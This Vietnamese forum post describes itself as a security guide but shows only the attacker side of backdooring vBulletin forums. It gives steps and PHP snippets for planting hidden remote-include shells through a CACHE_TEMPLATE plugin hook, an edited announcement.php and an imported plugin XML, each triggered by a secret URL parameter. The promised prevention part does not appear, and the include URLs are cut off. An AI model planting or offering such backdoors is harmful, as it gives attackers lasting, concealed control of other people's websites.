XtGem Forum catalog

- Nếu tải trang bị lỗi Xt:TimeOut hãy tải lại trang hoặc bấm vàoĐÂY

Admin nhận làm wap,forum giá rẻ. Liên hệ thông tin admin cuối trang để thương lượng giá và demo. Thank all
↓↓ » »

Phương pháp include shell trong source VBB và cách phòng chống


Đăng: Nhox Attend
Lượt xem: 7267
Ngày Đăng: 2015-04-04 / 06:56:24
Chia sẻ: SMS Google Zing Facebook Twitter

Mình viết bài này để giúp tăng cường bảo mật cho forum của các bạn, cho các bạn thấy được cách thức mà hacker đột nhập vào trang web các bạn để từ đó có cách phòng tránh. Mình không khuyến khích các bạn làm theo để thực hiện ý đồ xấu.
Viết tut này cũng có mặt lợi và mặt hại của nó nhưng nếu các bạn biết áp dụng cho mục đích lương thiện thì nó sẽ giúp ích rất nhiều cho bạn

I/Phương diện hacker - upload shell

Bỏ qua phần làm thế nào hacker có shell trên host, mình chỉ nói đến việc hacker đã khai thác file config và hoàn toàn chiếm quyền admin của website bạn. Sau đây mình sẽ liệt kê một cách gần như đầy đủ các phương pháp mà hacker có thể chèn shell và ẩn nó trong forum của bạn để có thể dễ dàng trong những cuộc tấn công tiếp theo.

Method 1: tạm gọi là up shell qua việc edit teamplate 0

Bạn lần lượt làm như sau:
Vào admincp -->Plugin manager -->Add new plugin Ở phần HOOK Location bạn chọn là : CACHE_TEMPLATE nhé,
Phần Name: có thể đặt tên tùy ý
Phần plugin php code hãy dùng đoạn code sau để include shell:
Code:

{
if($_GET['nameshell">=="heloworld"){
include'http:;
}
}
Copy Code

Phương pháp include shell trong source VBB và cách phòng chống
Tải ảnh #9

Nhớ kích vào nút đồng ý (yes) để active plugin này nhé .

Phương pháp include shell trong source VBB và cách phòng chống
Tải ảnh #8


Bây giờ cùng test nhé ở đây mình test trên localhost.
bạn thêm phần ?nameshell=helloworld vào sau:
index.php hoặc image.php, online.php hay bất cứ file php nào ở ngoài index của host, cái này tùy thuộc vào bạn
Ở đây mình thử với index.php nhé

Phương pháp include shell trong source VBB và cách phòng chống
Tải ảnh #7


[size=4">Method 2: chèn shell bằng cách edit file .php có trong host[/size">
Bạn tìm những file mà admin ít để ý để chèn đoạn code sau vào nhé, có thể chèn vào bất cứ đâu mà bạn muốn.
Code:

if ($_REQUEST['nameshell">=="helloworld") { include "http:; }
Copy Code

Demo: mình edit file announcement.php


/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.7.2
|| # ---------------------------------------------------------------- # ||
|| # Copyright ©2000-2007 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.c om | http://www.vbulletin.c om/license.html # ||
|| #################################################################### ||

\*======================================================================*/
if ($_REQUEST['nameshell'">=="helloworld") { include "http:; }
// ######################## SET PHP ENVIRONMENT ###########################
error_reporting(E_ALL & ~E_NOTICE);
// ##################### DEFINE IMPORTANT CONSTANTS #######################
define('THIS_SCRIPT', 'announcement');
// #################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array(
'postbit',
'reputationlevel',
'posting',
Copy Code
Hưởng thụ thành quả lao động nào.

Phương pháp include shell trong source VBB và cách phòng chống
Tải ảnh #6


Method 3: là cách import file xml qua plugin
Bạn lần lượt làm như sau:
Plugins & Products --> Download / Upload Plugins --> chọn lấy con shell xml và import vào. (đính kèm ở bài viết)

Phương pháp include shell trong source VBB và cách phòng chống
Tải ảnh #5


Bạn có thể mở source file shell xml lên và thay subscriptions.php bằng repair.php hoặc faq.php (bất cứ file .php nào trong admincp mà bạn nghĩ admin site đó sẽ không chú ý đến). Bạn cũng có thể import vào nhiều file cho chắc ăn.
cách run shell cũng khá đơn giản là bạn import shell vào file nào thì run file đó thôi chẳn hạn tôi import shell vào file subscriptions.php tôi sẽ run shell như thế này admincp/subscriptions.php làm theo tương tự với những file khác
demo here:

Phương pháp include shell trong source VBB và cách phòng chống
Tải ảnh #4

...
↑↑ Cùng chuyên mục
Share site flash có admin quản lý đẹp + ngon
Share code import file qua ftp
Hướng dẫn Backup/Restore Database bằng Sypex Dumper
Advanced Backup System - Công cụ sao lưu mọi thứ trên host
Tool SQLDumpSplitter (Chia nhỏ file *.sql)
Hướng dẫn Import big database bằng bigdump.php
[SHARE] Một thủ thuật nhỏ cho ai dùng Wap FTP
Share code chuyển mã html sang bbcode
Share code Wilib mod giống trasua.mobi
Phương pháp phát hiện và loại bỏ shell trong Database
123»
Bài viết ngẫu nhiên
[Share] BBcode dùng cho thiết kế wap cực ngắn gọn [Share] BBcode dùng cho thiết kế wap cực ngắn gọn
Share code wap chơi game GATA online Share code wap chơi game GATA online
Share code wap game nông trại online Share code wap game nông trại online
[HOT] Share code Wapgame Thần Chiến Online fix full lỗi, fix bug sql, add mod nông trại, ngân hàng [HOT] Share code Wapgame Thần Chiến Online fix full lỗi, fix bug sql, add mod nông trại, ngân hàng
Share Code wblib làm wap truyện mod cập nhật ngày 3/8/2013 Share Code wblib làm wap truyện mod cập nhật ngày 3/8/2013
Share code truyện wblib full mod by  cafe14.mobi Share code truyện wblib full mod by cafe14.mobi
Share Code sao lưu, Phục Hồi CSDL Cực Cool chỉ 1 file duy nhất Share Code sao lưu, Phục Hồi CSDL Cực Cool chỉ 1 file duy nhất
Hướng dẫn sửa lỗi: Hướng dẫn sửa lỗi: "Warning: mysql_fetch_array() expects parameter 1 to be resource."
Hướng dẫn dùng code trên 1 host và database để ở host khác Hướng dẫn dùng code trên 1 host và database để ở host khác
Share một số trang web chuyên share code Share một số trang web chuyên share code
123»
Tag:
TẮT QCBẬT QC
Liên kết
Wap sex 18+
Thông tin
© Design by: Nhox Attend
© Liên hệ: 01649373906
© Thanks to Xtgem
U-ON
© Filelist Thân Thiện Style VipTruyen